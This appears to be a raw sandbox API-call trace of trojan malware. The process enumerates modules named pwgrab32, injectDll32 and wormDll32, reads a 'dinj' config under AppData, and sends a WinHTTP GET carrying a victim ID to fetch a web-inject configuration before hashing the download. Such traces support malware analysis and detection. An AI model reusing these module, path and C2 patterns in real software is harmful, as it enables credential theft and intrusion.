	[0248.179] GetTokenInformation (in: TokenHandle=0x650, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0248.179] GetLastError () returned 0x7a
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6458
	[0248.179] GetTokenInformation (in: TokenHandle=0x650, TokenInformationClass=0x1, TokenInformation=0x22a6458, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6458, ReturnLength=0x128c98) returned 1
	[0248.179] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6460*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0248.179] CloseHandle (hObject=0x650) returned 1
	[0248.179] CloseHandle (hObject=0x644) returned 1
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c25d8
	[0248.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1450) returned 1
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2920
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1450
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807360
	[0248.180] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0248.180] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0248.180] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0248.180] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0248.180] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0248.180] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0248.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807360) returned 1
	[0248.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1450) returned 1
	[0248.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e18b8) returned 1
	[0248.180] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0248.180] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0248.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0248.180] Sleep (dwMilliseconds=0x4e20) 
	[0248.229] Sleep (dwMilliseconds=0x4e20) 
	[0248.245] Sleep (dwMilliseconds=0x4e20) 
	[0248.260] Sleep (dwMilliseconds=0x4e20) 
	[0248.279] Sleep (dwMilliseconds=0x4e20) 
	[0248.292] Sleep (dwMilliseconds=0x4e20) 
	[0248.308] Sleep (dwMilliseconds=0x4e20) 
	[0248.325] Sleep (dwMilliseconds=0x4e20) 
	[0248.340] Sleep (dwMilliseconds=0x4e20) 
	[0248.401] Sleep (dwMilliseconds=0x4e20) 
	[0248.447] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7bca7a80, dwHighDateTime=0x1d50a6a)) 
	[0248.447] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0248.447] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0248.447] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0248.447] CloseHandle (hObject=0x668) returned 1
	[0248.448] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7bca7a80, dwHighDateTime=0x1d50a6a)) 
	[0248.448] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7bca7a80, dwHighDateTime=0x1d50a6a)) 
	[0248.448] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0248.448] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0248.448] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dinj/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0248.448] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x1283d0, dwBufferLength=0x4) returned 1
	[0248.448] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0250.284] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0250.284] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1283c0, lpdwBufferLength=0x1283bc, lpdwIndex=0x0 | out: lpBuffer=0x1283c0*, lpdwBufferLength=0x1283bc*=0x4, lpdwIndex=0x0) returned 1
	[0250.284] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0xd80) returned 1
	[0250.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xd80) returned 0x27f3090
	[0250.285] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27f3090, dwNumberOfBytesToRead=0xd80, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x27f3090*, lpdwNumberOfBytesRead=0x1283bc*=0xd80) returned 1
	[0250.285] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.285] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27f3090, Size=0x2d80) returned 0x2809030
	[0250.285] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2809db0, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2809db0*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.285] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x11db) returned 1
	[0250.286] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2809030, Size=0x3f60) returned 0x274a0b8
	[0250.286] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x274ce38, dwNumberOfBytesToRead=0x11db, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x274ce38*, lpdwNumberOfBytesRead=0x1283bc*=0x11db) returned 1
	[0250.286] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.286] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x274a0b8, Size=0x5f60) returned 0x27fdb30
	[0250.286] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2801a8b, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2801a8b*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.286] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.286] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27fdb30, Size=0x7f60) returned 0x286be98
	[0250.286] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2871df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2871df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.286] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.287] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x9f60) returned 0x286be98
	[0250.287] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2873df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2873df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.287] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.287] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0xbf60) returned 0x286be98
	[0250.287] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2875df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2875df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.287] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.287] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0xdf60) returned 0x286be98
	[0250.287] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2877df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2877df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.287] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.288] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0xff60) returned 0x286be98
	[0250.288] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2879df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2879df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.288] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.288] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x11f60) returned 0x286be98
	[0250.288] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287bdf3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287bdf3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.288] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x13f60) returned 0x286be98
	[0250.289] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287ddf3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287ddf3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.289] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x15f60) returned 0x286be98
	[0250.289] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287fdf3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287fdf3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.289] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x17f60) returned 0x286be98
	[0250.289] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2881df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2881df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.289] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.330] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x19f60) returned 0x286be98
	[0250.330] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2883df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2883df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.330] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.330] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x1bf60) returned 0x286be98
	[0250.330] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2885df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2885df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.331] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.331] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x1df60) returned 0x286be98
	[0250.331] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2887df3, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2887df3*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.331] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0250.331] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x1ff60) returned 0x28bde60
	[0250.333] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x28dbdbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x28dbdbb*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0250.333] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x6c5) returned 1
	[0250.333] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x28bde60, Size=0x20620) returned 0x28dddc8
	[0250.350] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x28fdd23, dwNumberOfBytesToRead=0x6c5, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x28fdd23*, lpdwNumberOfBytesRead=0x1283bc*=0x6c5) returned 1
	[0250.350] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x0) returned 1
	[0250.351] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0250.351] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2761c48
	[0250.351] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.351] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.351] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0250.351] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.351] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778410
	[0250.351] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778410, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778410, pdwDataLen=0x128c3c) returned 1
	[0250.351] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.351] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.351] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.352] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.352] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0250.352] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778690
	[0250.352] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778690, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778690, pdwDataLen=0x128c3c) returned 1
	[0250.352] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.352] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.352] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.352] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.352] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0250.352] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27784b0
	[0250.352] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27784b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27784b0, pdwDataLen=0x128c3c) returned 1
	[0250.352] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.352] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.352] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.353] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.353] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0250.353] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.353] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778730
	[0250.353] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778730, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778730, pdwDataLen=0x128c3c) returned 1
	[0250.353] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.353] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.353] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.353] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.353] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0250.353] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.353] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a00
	[0250.353] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778a00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778a00, pdwDataLen=0x128c3c) returned 1
	[0250.353] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.353] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.353] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.354] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.354] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0250.354] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c40
	[0250.354] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777c40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777c40, pdwDataLen=0x128c3c) returned 1
	[0250.354] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.354] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.354] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.354] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.354] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0250.354] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27787a8
	[0250.354] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27787a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27787a8, pdwDataLen=0x128c3c) returned 1
	[0250.354] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.354] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.354] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.355] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.355] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0250.355] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.355] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777cb8
	[0250.355] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777cb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777cb8, pdwDataLen=0x128c3c) returned 1
	[0250.355] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.355] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.355] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.355] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.355] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0250.355] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.355] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0250.355] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778460, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778460, pdwDataLen=0x128c3c) returned 1
	[0250.355] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.355] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.355] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.356] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
